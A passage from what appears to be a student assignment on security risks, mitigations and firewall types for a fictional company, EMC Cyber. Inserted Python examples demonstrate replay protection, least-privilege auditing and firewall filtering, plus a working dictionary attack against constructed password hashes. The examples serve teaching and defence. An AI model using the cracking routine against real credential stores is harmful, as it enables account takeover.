applications. A dependable cloud-based backup lets data be restored accurately and
within minutes.
 Create a data recovery and business continuity plan with specific remedial actions,
such as prompt customer communication, for the case of data loss.

1.2 Identify types of security risks EMC Cyber is subject to its present setup and the
impact that they would make on the business itself. Evaluate at least three physical and
virtual security risks identified and suggest the security measures that can be
implemented in order to improve the organization’s security.

Risk
What is a Risk?
Risk may be defined as the chance that something harmful will occur. It is uncertainty about
how an action will affect something that people value (such as health, well-being, wealth,
property or the environment), usually with a focus on unfavourable outcomes. Many
definitions have been proposed; the international standard (ISO 31000) defines risk as the
"effect of uncertainty on objectives".

Security Risk
Anything on a computer that may harm it, steal its data or give someone else access to it
without the owner's knowledge or agreement constitutes a computer security risk. Such risks
can arise from a wide variety of sources, including malware, a catch-all term for several
subtypes of harmful software. Viruses are the first thing that comes to mind, but Trojan
horses, worms, ransomware and spyware are equally capable of compromising a system.
Risks also arise from improperly configured hardware and risky computing practices.

EMC CYBER - Security Risks:


Malware attack

Attackers use a variety of techniques, most often social engineering, to install malware on a
user's device. Users may be prompted to take an action, such as opening an attachment or
clicking a link. In other cases, malware installs itself without the user's knowledge or
consent by exploiting flaws in operating systems, browsers or other software.

Once malware has been installed, it can monitor user activity, send sensitive information to
the attacker, help the attacker reach other targets on the network, and even make the device a
member of a botnet that the attacker uses for malicious purposes.

1) Trojan: deceives the user into believing it is a legitimate file or program. Once run, a
Trojan can open a backdoor that attackers use to reach the system.
2) Ransomware: blocks access to the victim's data, typically by encrypting it, and
threatens to delete or publish it unless a ransom is paid.
3) Worms: malware that spreads on its own across a network by exploiting
vulnerabilities or existing backdoors, without any user action. After installation a
worm may launch further attacks, including distributed denial of service (DDoS).
4) Spyware: malware that lets criminals harvest sensitive data, such as credit card and
login details, without authorisation. Mobile devices, desktop applications and
browsers can all be affected.

Social engineering attacks

Social engineering attacks work by psychologically manipulating users into performing
actions that benefit the attacker or into divulging sensitive information.

1) Phishing: criminals send fraudulent email that appears to come from a trusted source.
The email may urge the recipient to take an urgent action, click a link to a malicious
website or download malicious software, prompting them to hand critical information
to the attacker. Phishing emails frequently carry malware-infected attachments.
2) Spear phishing: a targeted form of phishing aimed at specific individuals, often those
with privileged access such as system administrators or senior executives, using
details about the target to make the lure convincing.
3) Malvertising: online advertising controlled by attackers that infects the visitor's
machine with malware when it is clicked or, in some cases, merely displayed. Many
reputable web publications have been found to carry malicious advertising.

Software supply chain attacks

A software supply chain attack targets weak points in the trusted software delivery and
update chain of a company. A supply chain is the network of all people, businesses,
resources, tasks, activities and technologies involved in producing and distributing a product.
A software supply chain attack exploits the trust that businesses place in their outside
providers, particularly for updates and patches. Typical forms include:

1) compromise of software development tools or dev/test infrastructure
2) theft or compromise of equipment or accounts belonging to privileged third-party
providers
3) malicious applications distributed using stolen or forged developer IDs or code
signing certificates
4) malware implanted in firmware or hardware components
5) pre-installed malware on devices such as cameras, USB drives and mobile phones

Distributed denial of service (DDoS)

A denial of service (DoS) attack aims to exhaust the resources of a target system so that it
cannot serve legitimate users. In a distributed denial of service (DDoS) attack, many
compromised computers or other devices take part in a coordinated assault on the target.

DDoS attacks are frequently combined with other threats. An attack may begin with a denial
of service to distract security staff and cause confusion while more covert actions, such as
data theft, are carried out.

1) Botnets: networks of malware-infected machines under the control of attackers, who
use these bots to launch DDoS attacks. Large botnets can contain millions of devices
and conduct massively destructive assaults.
2) Smurf attack: the attacker sends ICMP echo requests to a network's broadcast
address with the source address spoofed to the victim's IP. Every host on that network
replies to the victim, so one spoofed request produces many responses. Automated
and run at scale, this amplification overwhelms the target.

Man-in-the-middle attack (MitM)

Users and devices assume they are communicating directly with the target system's server
when they access a remote system over the internet. In a MitM attack, attackers break this
assumption by placing themselves between the user and the target server.

1) Session hijacking: an attacker takes over an established session between a client and
a server, typically by stealing the session token or cookie, or by spoofing the client's
IP address at the network layer. The server believes it is still talking to the legitimate
client and continues the session.
2) Replay attack: an attacker eavesdrops on network communication and later re-sends
captured messages, pretending to be the user. Replay attacks are mitigated by binding
each message to a timestamp and a single-use nonce (or sequence number) under a
message authentication code, so a copied message is rejected as stale or duplicated.
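The timestamp-plus-nonce defence is easier to see in code. The following is an added example, not part of the original assignment: a client attaches a timestamp, a fresh nonce and an HMAC over the whole message, and the server rejects forgeries, stale messages and replays in that order. The shared key, the 30-second acceptance window and the messages are assumptions for illustration.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

SHARED_KEY = b"example-shared-secret"  # assumption: pre-shared between client and server
MAX_SKEW = 30  # seconds: messages older (or newer) than this are rejected as stale


def sign(key: bytes, payload: str, ts: int, nonce: str) -> str:
    """MAC over timestamp, nonce and payload together, so none can be swapped independently."""
    msg = f"{ts}|{nonce}|{payload}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_request(payload: str, now: Optional[int] = None) -> dict:
    """Client side: stamp the message with the current time and a single-use random nonce."""
    ts = int(time.time()) if now is None else now
    nonce = os.urandom(8).hex()
    return {"payload": payload, "ts": ts, "nonce": nonce,
            "mac": sign(SHARED_KEY, payload, ts, nonce)}


class Server:
    def __init__(self, key: bytes, max_skew: int = MAX_SKEW):
        self.key = key
        self.max_skew = max_skew
        self.seen = {}  # nonce -> timestamp of accepted messages

    def accept(self, req: dict, now: Optional[int] = None) -> str:
        now = int(time.time()) if now is None else now
        # 1. Authenticity first: a forged or altered message never gets further.
        expected = sign(self.key, req["payload"], req["ts"], req["nonce"])
        if not hmac.compare_digest(expected, req["mac"]):
            return "rejected: bad MAC"
        # 2. Freshness: bounds how long a captured message stays usable.
        if abs(now - req["ts"]) > self.max_skew:
            return "rejected: stale timestamp"
        # 3. Uniqueness: the same nonce is never honoured twice inside the window.
        if req["nonce"] in self.seen:
            return "rejected: replay"
        self.seen[req["nonce"]] = req["ts"]
        # Nonces older than the window can be forgotten: a replay of them would
        # already fail the timestamp check, which is why both checks are needed.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.max_skew}
        return "accepted"


if __name__ == "__main__":
    server = Server(SHARED_KEY)
    req = make_request("transfer 100 to acct 42")
    print(server.accept(req))   # accepted
    print(server.accept(req))   # rejected: replay
```

The timestamp alone is not enough, because a message can be replayed within the window; the nonce alone is not enough, because the server would have to remember every nonce forever. Together they let the server keep a small, bounded set of recent nonces.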

Password attacks

A hacker can obtain a user's password by 'sniffing' the network connection, through social
engineering, by guessing, or by gaining access to a password database. Guessing can be
random or systematic.

1) Brute-force password guessing: the attacker uses software to try many candidate
passwords. The program may apply some logic, testing passwords derived from the
user's name, occupation, family and so on.
2) Dictionary attack: the attacker uses a list of common passwords to gain access to the
victim's machine and network. One offline approach is to copy a file containing
password hashes, hash every word in the dictionary with the same algorithm, and
compare the results; unsalted, fast hashes make this cheap.
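The offline dictionary attack above, and the brute-force guessing described under "Weak or Stolen User Credentials" later in this section, come down to the same computation. This added example (not the assignment's own code) runs a constructed wordlist against two constructed password stores: one using an unsalted SHA-256, where a single precomputed table cracks every user at once, and one using a per-user salt with PBKDF2, where every guess has to be recomputed for each user at a deliberately high cost. The wordlist, user names and iteration counts are illustrative assumptions.

```python
import hashlib
import os
from typing import Optional

# Constructed wordlist standing in for a "top 10,000 passwords" dictionary.
WORDLIST = ["123456", "password", "qwerty", "letmein", "Summer2022", "welcome1", "iloveyou"]


def weak_store(password: str) -> str:
    """Unsalted, fast hash: identical passwords give identical hashes for every user."""
    return hashlib.sha256(password.encode()).hexdigest()


def strong_store(password: str, salt: Optional[bytes] = None, iterations: int = 200_000) -> dict:
    """Per-user random salt plus a deliberately slow KDF (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}


def crack_weak(hashes: dict, wordlist) -> dict:
    """One table for the whole dictionary cracks every user in a single pass:
    cost is len(wordlist) hashes no matter how many users there are."""
    table = {weak_store(w): w for w in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}


def crack_strong(records: dict, wordlist) -> dict:
    """The salt defeats the shared table: each (user, guess) pair costs a full KDF run,
    so cost is len(records) * len(wordlist) * iterations hash operations."""
    found = {}
    for user, rec in records.items():
        salt = bytes.fromhex(rec["salt"])
        for w in wordlist:
            cand = hashlib.pbkdf2_hmac("sha256", w.encode(), salt, rec["iterations"]).hex()
            if cand == rec["hash"]:
                found[user] = w
                break
    return found


if __name__ == "__main__":
    weak = {"alice": weak_store("letmein"), "bob": weak_store("Tr0ub4dor&3!xQ")}
    print("weak store cracked:", crack_weak(weak, WORDLIST))
    strong = {"alice": strong_store("letmein"), "bob": strong_store("Tr0ub4dor&3!xQ")}
    print("strong store cracked:", crack_strong(strong, WORDLIST))
```

Both stores give up "alice", whose password is in the dictionary: salting and a slow KDF raise the attacker's cost per guess, they do not rescue a password that is on the list. That is why the password policy later in this assignment screens new passwords against known-breached lists.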

Natural disasters that could affect EMC Cyber

1. Lightning: nature has some extremely destructive weapons, and lightning is among the
deadliest. A lightning strike, or the power surge it induces, can destroy the electrical
equipment that makes up EMC's data centre. Such an outage would be a major problem
for EMC Cyber and its clients.
2. Fire: a fire can spread through EMC's data centre and cause permanent damage to
storage systems if the facility is not adequately equipped with detection and suppression.

Physical and Virtual Security Risks


Physical Security Risks
A physical security risk is an exposure arising from the physical environment: for instance,
insufficient security training for personnel, computers or laptops left unattended at
workstations, or minimal control over who enters and leaves the premises. Such exposures
should never simply be accepted.

 Tailgating

What is tailgating?

 Tailgating is when an unauthorised individual follows an authorised person into a
secure area.
 It happens readily when several people pass through a door and only the first has to
show identification or swipe a card. Those behind simply continue through, making it
easy for an unauthorised person to enter unnoticed.

How to reduce tailgating risks?

 Fortunately, tailgating can be controlled with the proper physical security measures.
Anti-tailgating doors (turnstiles or mantraps), if you are prepared to spend the money,
practically eliminate it. They can be expensive to install, but are worth considering
when moving to a new office site.

 Theft of documents

There are probably papers and documents scattered around the office, from desks to printing
stations. Sensitive paperwork can easily go missing and end up in the wrong hands, and
visitors may see information they should not, even if nothing leaves the office.

How to prevent document thefts?

Implementing a clear-desk policy is one of the best ways to stop the theft or accidental
disclosure of papers and sensitive information. With a clear-desk policy, every desk is
cleared and all paperwork put away at the end of the working day, so sensitive documents
are far less likely to be left in exposed places. Staff must also shred or otherwise destroy
confidential documents once they are no longer needed.

 Stolen Identification

An access control system only works if each person uses their own identity. It does not
matter how much access control is in place if individuals are entering and leaving the
premises with someone else's credentials.

How to prevent stolen IDs?

Employees must be made aware of the value of safeguarding their IDs and access cards.
Without adequate training, staff frequently lend or swap cards, which makes access
impossible to manage effectively. Employees will not take proper care of their IDs unless
it is made clear how important it is to do so.

Virtual Security Risks

Virtual (logical) security risks act on systems, software and data rather than on the premises.
Malware, ransomware and virus attacks affect virtual machines as readily as physical hosts,
and users lacking security awareness or malicious VM images are further sources of such
attacks. Without adequate isolation and safeguards, a compromised virtual machine (VM)
can spread malware across the whole virtual infrastructure.

Viruses

A computer virus is a type of computer program that, when executed, replicates itself by
modifying other computer programs and inserting its own code. If this replication succeeds,
the affected areas are then said to be "infected" with a computer virus, a metaphor derived
from biological viruses.

How to prevent viruses?

 Install antivirus or anti-malware software.
 Keep the antivirus software up to date.
 Run antivirus scans regularly.
 Keep the operating system up to date.
 Protect the network.
 Think before clicking.
 Keep personal information secure.
 Do not use unsecured Wi-Fi.

Malware Attacks

Malware is any program deliberately designed to disrupt a computer, server, client or
network, leak confidential data, gain unauthorised access to data or systems, deny users
access to information, or otherwise compromise user privacy and security.

A malware attack is a common cyberattack in which the victim's system is compromised by
malicious software. The term covers ransomware, Trojans, command-and-control implants
and other specialised kinds of malicious code, all of which are loosely (and inaccurately)
referred to as "viruses".

Malware deployment has been attributed to criminal organisations, state actors and, in some
cases, well-known corporations. Like other forms of cyberattack, some malware incidents
receive widespread press attention because of their serious consequences.

How to prevent malware?

 Use network and endpoint security tools
 Use encryption to secure data in transit
 Educate employees to recognise common cyber threats and scam tactics
 Update IT systems, plugins and software regularly
 Use secure authentication methods
 Implement identity management and access controls

Ransomware

Ransomware is malware that threatens to publish the victim's data or block access to it,
typically by encrypting it, unless the victim pays the attacker a ransom. The demand usually
comes with a deadline: if the victim does not pay in time, the data is lost permanently or the
price rises.

How to prevent Ransomware?

 Back up data (keep offline or immutable copies the malware cannot reach)
 Keep all systems and software updated
 Install antivirus software and firewalls
 Network segmentation
 Email protection
 Application whitelisting
 Endpoint security

Vulnerability
Vulnerabilities are weaknesses in a computer system that reduce its overall security. They
may be flaws in the hardware itself or in the software that runs on it. A threat actor, such as
an attacker, can use a vulnerability to bypass privilege restrictions and carry out unauthorised
operations on the system. To exploit a vulnerability, an attacker needs at least one tool or
technique that can reach the flaw. The set of all such points through which a system can be
reached is called its attack surface.

Figure 2 Vulnerability

Vulnerabilities

Misconfigurations

Security misconfiguration happens when security settings are not properly established
during setup, or are left at and deployed with their default values. Any tier of the application
stack, cloud or network can be affected. Misconfigured cloud services are a major contributor
to data breaches, which end up costing businesses millions of dollars.

How to prevent Misconfigurations?

 Create a repeatable hardening procedure so that new environments can be deployed
quickly and correctly configured. Production, development and QA environments
must be configured identically, but each must use a different set of credentials.
Automate the procedure so that a secure environment can be created quickly.
 Install software patches and updates regularly and promptly in every environment.
Alternatively, patch a golden image and deploy it across the environments.
 Design the application architecture to provide effective, secure separation of
components.
 Run scans and audits often and on a fixed schedule to find security weaknesses or
missing patches.

Unsecured APIs

Application programming interfaces (APIs) that are not secured are another common
vulnerability. APIs provide a programmatic interface that allows communication between
applications, or between components of an application, over the internet or a private
network.

APIs are often among the few corporate assets deliberately exposed on a public IP address.
If they are not properly and sufficiently protected they become an easy target for attackers.

How to prevent Unsecured APIs?

 Put security first. API security should not be neglected or treated as "someone else's
concern". Make it a priority and build it into APIs as they are designed, since
organisations stand to lose a lot from unsafe APIs.
 Manage the API inventory. Whatever the number of publicly accessible APIs a
company has, it must first know about them in order to protect and manage them; many
organisations do not. Run perimeter scans to find and catalogue them, then work with
DevOps teams to manage them.
 Encrypt traffic with TLS. Some organisations may choose not to encrypt API payloads
regarded as non-sensitive (for example, weather data), but TLS should be treated as
mandatory for any API that exchanges sensitive data such as login credentials, credit
card, social security, banking or health information.

Access Control or Unauthorized Access

Companies often grant employees more access and permissions than they need to perform
their job functions. This increases identity-based threats and widens what an adversary can
reach in the event of a breach.

 The principle of least privilege (POLP), a security concept and practice that grants
individuals only the access needed for the activities essential to their jobs, should be
applied to overcome this. Under POLP, only authorised users whose identities have
been verified are given the rights required to carry out tasks in specific systems,
applications, data and other assets.
 Because it lets enterprises manage and monitor network and data access, POLP is
widely regarded as one of the best practices for improving an organisation's security
posture.
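As an added illustration (not part of the assignment), the following code models least privilege as a deny-by-default permission check plus an audit that compares what each user has been granted against what their role actually needs, and reports what an attacker could reach through an over-privileged account. The roles, resources and users are constructed examples.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Permission:
    resource: str  # e.g. "payroll-share"
    action: str    # "read", "write" or "admin"


# Constructed role model: the permissions each job function genuinely needs.
ROLE_NEEDS = {
    "helpdesk": {Permission("ticket-system", "write"), Permission("directory", "read")},
    "payroll": {Permission("payroll-share", "read"), Permission("payroll-share", "write")},
    "sysadmin": {Permission("servers", "admin"), Permission("directory", "write")},
}


def is_allowed(granted: set, resource: str, action: str) -> bool:
    """Deny by default: access passes only with an explicit grant for this resource and action."""
    return Permission(resource, action) in granted


def excess_privileges(role: str, granted: set) -> set:
    """Grants the user holds that the role does not need; each one widens the blast radius."""
    return granted - ROLE_NEEDS[role]


def missing_privileges(role: str, granted: set) -> set:
    """Needed permissions the user lacks (least privilege is not the same as under-provisioning)."""
    return ROLE_NEEDS[role] - granted


def reachable_if_compromised(granted: set) -> set:
    """Resources an attacker controls if this account is taken over."""
    return {p.resource for p in granted}


def least_privilege_report(users: dict) -> dict:
    """users: name -> (role, granted permissions). Returns excess and missing grants per user."""
    return {
        name: {
            "excess": excess_privileges(role, granted),
            "missing": missing_privileges(role, granted),
            "reach": reachable_if_compromised(granted),
        }
        for name, (role, granted) in users.items()
    }


if __name__ == "__main__":
    # Constructed users: dana has one grant beyond her helpdesk role.
    dana = {Permission("ticket-system", "write"), Permission("directory", "read"),
            Permission("payroll-share", "read")}
    raj = {Permission("payroll-share", "read")}
    for user, result in least_privilege_report({"dana": ("helpdesk", dana), "raj": ("payroll", raj)}).items():
        print(user, result)
```

Run regularly (for instance from an export of the directory or IAM policies), the report turns the principle into a concrete list of grants to revoke, which is the part of POLP that usually gets neglected once the initial provisioning is done.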

Weak or Stolen User Credentials

Many people make the mistake of using the same weak password for all of their accounts.
Reusing or recycling passwords and user IDs opens up another channel for attackers to
exploit.

Weak credentials are most often abused in brute force attacks, in which a threat actor tries as
many username/guessed-password combinations as possible to gain unauthorised access to
sensitive data and systems. A successful attacker enters the system as the authorised user,
and from there can move laterally, plant backdoors, learn more about the environment for
future attacks and, of course, steal data.

 To mitigate this risk, organisations should establish and enforce explicit standards that
require strong, unique passwords and require a change whenever compromise is
suspected (routine forced rotation tends to produce predictable variations). Organisations
should also adopt multi-factor authentication (MFA), which needs more than one form
of evidence, such as a password plus a fingerprint or a password plus a one-time
security token, to authenticate a user.

Threat
A threat in the context of computer security is a potential negative action or event, made
possible by a vulnerability, that leads to an unintended effect on a computer system or
application.

A threat can be "accidental" (such as a hardware failure, or a natural event like an
earthquake, fire or tornado) or "intended": a condition, capability, action or event caused
deliberately, for example by an individual cracker or a criminal organisation.

Figure 3 Threats

Security Threats

Malware

Malware is a broad category of unwanted software that can harm a business in many ways,
from erasing data to draining resources by turning machines into botnet members or
cryptocurrency miners. It is perhaps the most fundamental and widely known threat.

The main types include viruses, which aim to reproduce and spread as widely as possible;
Trojans, which get into networks by posing as trustworthy programs; and spyware, which
monitors an employee's activity to obtain sensitive data.

Protecting against malware

 Defending against this variety of attacks is not simple, which is why capable
anti-malware software is crucial. Hundreds of tools promise protection, but enterprises
must make sure the solution they choose can also detect malware that has not been seen
before, by recognising its characteristic behaviour, such as a program that tries to hide
itself once installed. The tool must also be kept updated and be able to scan every
potential point of entry into the network, including email and USB flash drives.

Cloud security

Most companies, big and small, operate on the cloud. There are several reasons why most
contemporary firms rely on cloud computing, from decreased IT expenses to greater
scalability and simpler collaboration. But it does come with a unique set of difficulties.

In one industry survey, 57% of respondents ranked cloud security as the second most
important threat to their firms' cybersecurity this year, behind malware. The key cloud
security issues organisations need to be aware of are account hijacking, configuration errors,
external data sharing, data loss or leakage, unauthorised access, and insecure interfaces and
APIs.

Protecting against cloud threats

 To guarantee that your infrastructure and data are safe, implementing strong cloud
security policies may assist guard against the numerous threats and vulnerabilities.
Securing user endpoints, deploying encryption, and emphasising the need of good
password hygiene are just a few of the many details that must be taken into
consideration while ensuring cloud security. Making the appropriate cloud provider
choice early on will ease some of the burden on you when it comes to guaranteeing
the security of your business and its clients in the cloud.

Phishing

Phishing, one of the most prevalent forms of social engineering threat, primarily entails
sending emails that appear to be from a well-known and reliable source and sometimes
include a bogus link that asks recipients to submit personal information into an online form.
Phishing and other social engineering attacks are, according to 51% of IT experts, their main
difficulties this year.

These are frequently intended to be techniques to get access to financial information or login
and password combinations, but they are capable of much more, particularly with the more
targeted "spear phishing" kind, which is specifically tailored to each receiver.

Protecting against phishing

 Email security tools, although not 100% effective, help reduce the number of such
emails that are delivered. Beyond that, the best defence is user education. By teaching
staff to be cautious and to recognise the warning signs of a phishing attempt, businesses
can greatly reduce the chance of employees disclosing sensitive information.

Data loss

Data is commonly referred to as the "new oil", and for many hackers stealing it and selling
it on the dark web, for use in identity theft, extortion or corporate espionage, is the whole
point of their activity.

Given that data is now the foundation of all corporate operations, it should come as no
surprise that 26% of businesses view data loss as the top cybersecurity issue they are
currently facing. Getting data out of an organisation is frequently the last phase of any
assault, whether it is utilising social engineering or breaking into a database using known
flaws.

Protecting against data loss

 Even when a company's perimeter has been breached, there are steps it can take to
avoid the most serious consequences, but it needs effective data loss prevention (DLP)
tools to do so. Attackers may sit inside a network for months, looking for the most
valuable information and waiting for the right moment to act.
 DLP refers to a set of controls that watch for suspicious activity and stop unauthorised
users from accessing or exfiltrating data. It can monitor endpoints and alert
administrators when data is copied or moved outside normal, authorised operations.

1.3 Develop and describe security procedures for EMC Cyber to minimize the impact of
issues discussed in section (1.1) by assessing and rectifying the risks.

Security procedures for EMC Cyber to minimize the impact of risks.
 Encrypt Your Data and Create Backups
o Ensure that every piece of sensitive data is encrypted. Plaintext files simply make it
easy for criminals to read EMC data; encryption restricts access to those who hold
the decryption key, so even if unauthorised individuals obtain the data they cannot
read it. Authenticated encryption modes also reveal when someone has altered or
tampered with the ciphertext.
o EMC must also back up sensitive corporate data regularly. Cybersecurity breaches
sometimes cause data loss, and without a trustworthy, secure backup plan this can
cause operational disruptions that cost the firm a great deal in lost income. The
3-2-1 rule is one of the best backup techniques: keep at least three copies of the
data, on two different types of media, with one copy stored offsite.
 Conduct Regular Employee Training
o Phishing emails sent to EMC workers are one of the most frequent ways criminal
hackers obtain the company's information. According to statistics, about 3.4 billion
phishing emails are sent worldwide every day. Links in these emails lead to
credential-harvesting pages or malware downloads that give attackers access to user
information, including login passwords.
o Phishing emails are hard to spot because they look genuine. A hacker may, for
instance, send an email posing as a head of department and requesting personal
information; a worker who has not had the required training may hand it over. EMC
must therefore run cybersecurity awareness training, informing staff about the main
types of threat and the effective defences against them.
 Keep EMC Cyber Systems and Software Updated
o System and software updates have a significant effect on EMC's cyber security and
digital safety. Updates do not just bring new features; they fix bugs and patch
exploitable security holes and vulnerabilities.
o Malicious hackers write code that exploits those flaws. Most of the time it is
packaged as malware that can harm the whole EMC environment, so EMC should
have a patch management solution that applies all updates automatically and keeps
information secure.
 Use Strong Passwords
o Simple passwords are no longer sufficient given the advances in password cracking
technology. To deter attacks, the firm should require multi-factor authentication and
strong passwords. Password sharing among staff must also be forbidden, so that one
compromised account does not expose the others.
o Password rules that reduce this risk include:
 at least 12 characters; a longer passphrase is easier to remember and harder to guess;
 a mix of character classes (letters, digits and symbols) rather than letters alone;
 no personal information such as names, birthdays or the company name;
 unique to each account, never reused, and screened against lists of passwords
exposed in known breaches.
 Assess and Monitor EMC Cyber Vendors
o EMC cannot afford to overlook vendor risk management, because third-party vendors
are likely to play a significant role in its security. Managing vendor risk up front helps
EMC reduce third-party risk rather than relying on incident response alone.
o EMC Cyber's primary attention should be on:
 Cybersecurity risk: onboard suppliers using the proper procedures and monitor them
throughout the engagement.
 Legal, regulatory and compliance risk: verify that the vendor will not affect EMC's
compliance with agreements, regulations and local laws.
 Operational risk: if the vendor is important to the business, make sure they will not
disrupt operations.
 Strategic risk: make sure the vendor will not interfere with EMC's capacity to
achieve the organisation's goals.

 Install Firewalls
o Hackers constantly develop new techniques for gaining access to data, and
cyber security dangers are evolving. Installing firewalls will protect EMC
networks from online threats. A trustworthy system will successfully defend
EMC from brute force assaults or stop security mishaps from inflicting
irreparable harm.
o Additionally, firewalls keep an eye on network traffic to spot any unusual
activity that can jeopardise the security of your data. They also support data
privacy and stop sophisticated spyware from accessing your computers.

Protect EMC Cyber from Cybersecurity Risks

 Creating data backups and encrypting sensitive information.
 Updating all security systems and software.
 Conducting regular employee cybersecurity training.
 Using strong and complex passwords.
 Installing firewalls.
 Reducing your attack surfaces.
 Assessing your vendors.
 Having a kill switch in place.
 Creating solid cyber risk policies and strategies.
 Protecting your physical premises.

ACTIVITY 02
2.1 Identify how EMC Cyber and its clients will be impacted by improper/incorrect
configurations that are applicable to firewalls and VPN solutions. IT security can
include a network monitoring system. Discuss how EMC Cyber can benefit by
implementing a network monitoring system with supporting reasons.

Firewall
What is a Firewall?

A firewall is a network security device used in computing that monitors and regulates
incoming and outgoing network traffic in accordance with pre-established security rules.
Typically, a firewall creates a wall between a trustworthy network and an unreliable network,
like the Internet.

Figure 4 Firewall

How does a firewall work?

Data trying to access your computer or network is filtered by firewalls, which might be
hardware or software. The purpose of firewalls is to filter out harmful software or known
attack vectors from transmissions. The firewall stops data packets from entering the network
or getting to your computer if they are detected as security risks.

1. Network based firewalls

Intranets are protected by network firewalls, which are security tools intended to prevent or
lessen illegal access to private networks connected to the Internet. Firewall policies specify
the only traffic that is permitted on the network; all other traffic that tries to reach the
network is prohibited. Network firewalls serve as a communications bridge between internal
and external devices, sitting at the edge of a network.

Any data entering or leaving the network may be programmed to pass through a network
firewall; it does this by inspecting each incoming message and rejecting those that do not fit
the established security standards. When set up correctly, a firewall keeps away unauthorised
users, hackers, viruses, worms, and other hazardous software from trying to enter the
protected network while still enabling users to access whatever resources they require.

2. Host based firewalls

A host-based firewall is firewall software installed directly on a host (rather than on the network).
Host-based firewalls aid in the detection and termination of viruses, malware, and other
harmful programmes that network security may not have been able to stop. An individual
computer is safeguarded against viruses and other harmful software when a host-based
firewall is installed, updated, and operating on the machine.

Firewall Types

 packet filtering firewall
 circuit-level gateway
 application-level gateway (aka proxy firewall)
 stateful inspection firewall
 next-generation firewall (NGFW)

Packet filtering firewall

Packet filtering firewalls run inline at the junctions where equipment such as
routers and switches operates. These firewalls don't route packets; instead, they
check each one against a list of predetermined criteria such as the permitted IP
addresses, packet type, port number, and other information from the packet
protocol headers. Packets that fail the check are unceremoniously discarded,
which means they are not forwarded and simply vanish.

Advantages:

 A single device can filter traffic for the entire network
 Extremely fast and efficient in scanning traffic
 Inexpensive
 Minimal effect on other resources, network performance and end-user experience

Circuit-level gateway

Circuit-level gateways monitor TCP handshakes and other session-initiation
messages as they are established across the network between local and remote
hosts, to determine whether the session being initiated is legitimate, that is,
whether the remote system is regarded as trusted. This is another relatively
quick way of identifying malicious content. They do not inspect the packets
themselves.

Advantages:

 Only processes requested transactions; all other traffic is rejected
 Easy to set up and manage
 Low cost and minimal impact on end-user experience

Application-level gateway

This type of device, technically a proxy but often referred to as a proxy
firewall, is the single point of entry and exit for the network. Application-level
gateways filter packets not only by the service they are meant for, as indicated
by the destination port, but also by other characteristics, such as the HTTP
request string.

Advantages:

 Examines all communications between outside sources and devices behind the
firewall, checking not just address, port and TCP header information, but the content
itself before it lets any traffic pass through the proxy
 Provides fine-grained security controls that can, for example, allow access to a
website but restrict which pages on that site the user can open
 Protects user anonymity

Stateful inspection firewall

State-aware devices track whether a packet is a part of an active TCP or other network
session in addition to inspecting each packet. While providing better security than
either circuit monitoring or packet filtering by itself, this has a bigger negative impact
on network performance.
The multilayer inspection firewall, which considers the flow of transactions taking
place across many protocol levels of the seven-layer Open Systems Interconnection
(OSI) architecture, is another variation on stateful inspection.

Advantages:

 Monitors the entire session for the state of the connection, while also checking IP
addresses and payloads for more thorough security
 Offers a high degree of control over what content is let in or out of the network
 Does not need to open numerous ports to allow traffic in or out
 Delivers substantive logging capabilities

Next-generation firewall

A typical next-generation firewall (NGFW) combines packet inspection with
stateful inspection, as well as some form of deep packet inspection (DPI), and
additional network security tools such as an IDS/IPS, malware filtering, and
antivirus. DPI examines the actual data that a packet is carrying, whereas
classical firewalls only check the packet's protocol header. For example, a DPI
firewall that monitors web browsing can reassemble a packet payload with the
other packets of an HTTP server reply and determine whether the result is a
valid HTML-formatted answer.

Advantages:

 Combines DPI with malware filtering and other controls to provide an optimal level
of filtering
 Tracks all traffic from Layer 2 to the application layer for more accurate insights than
other methods
 Can be automatically updated to provide current context
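To make the difference between a packet filtering firewall and a stateful inspection firewall concrete, the Python simulation below is an added example, not from the original assignment. It runs one constructed packet stream through a stateless rule set and through a session-tracking filter; the internal address range, the allowed ports and the sample packets are assumptions.

```python
from dataclasses import dataclass

INTERNAL_PREFIX = "10.0.0."          # constructed internal LAN
ALLOWED_OUTBOUND = {80, 443}         # inside hosts may open web sessions


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: str                       # "SYN", "SYN-ACK" or "ACK"


def packet_filter(pkt: Packet) -> bool:
    """Stateless packet filter: each packet is judged on its headers alone.
    Because it cannot recognise replies, it has to leave the high ports open
    to inbound traffic so that answers to outbound sessions get through."""
    if pkt.src.startswith(INTERNAL_PREFIX) and pkt.dport in ALLOWED_OUTBOUND:
        return True
    if pkt.dst.startswith(INTERNAL_PREFIX) and pkt.dport >= 1024:
        return True                  # the "return traffic" hole
    return False


class StatefulFirewall:
    """Stateful inspection: remembers sessions opened from the inside and
    only admits inbound packets that belong to one of them."""

    def __init__(self) -> None:
        self.sessions: set[tuple[str, int, str, int]] = set()

    def allow(self, pkt: Packet) -> bool:
        key = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if (pkt.src.startswith(INTERNAL_PREFIX)
                and pkt.dport in ALLOWED_OUTBOUND and pkt.flags == "SYN"):
            self.sessions.add(key)   # a new session opened from inside
            return True
        # Anything else passes only if it belongs to a known session.
        return key in self.sessions or reverse in self.sessions


def compare(packets: list[Packet]) -> list[tuple[bool, bool]]:
    """Run the same packet stream through both devices and return the
    (stateless verdict, stateful verdict) pair for each packet."""
    fw = StatefulFirewall()
    return [(packet_filter(p), fw.allow(p)) for p in packets]


# Constructed traffic: one legitimate web session from a desktop, then an
# unsolicited inbound connection attempt to that desktop's remote-desktop port.
SAMPLE = [
    Packet("10.0.0.7", 51000, "203.0.113.5", 443, "SYN"),
    Packet("203.0.113.5", 443, "10.0.0.7", 51000, "SYN-ACK"),
    Packet("10.0.0.7", 51000, "203.0.113.5", 443, "ACK"),
    Packet("198.51.100.9", 4444, "10.0.0.7", 3389, "SYN"),
]

if __name__ == "__main__":
    for pkt, (stateless, stateful) in zip(SAMPLE, compare(SAMPLE)):
        print(f"{pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport} {pkt.flags:8}"
              f" packet filter={stateless} stateful={stateful}")
```
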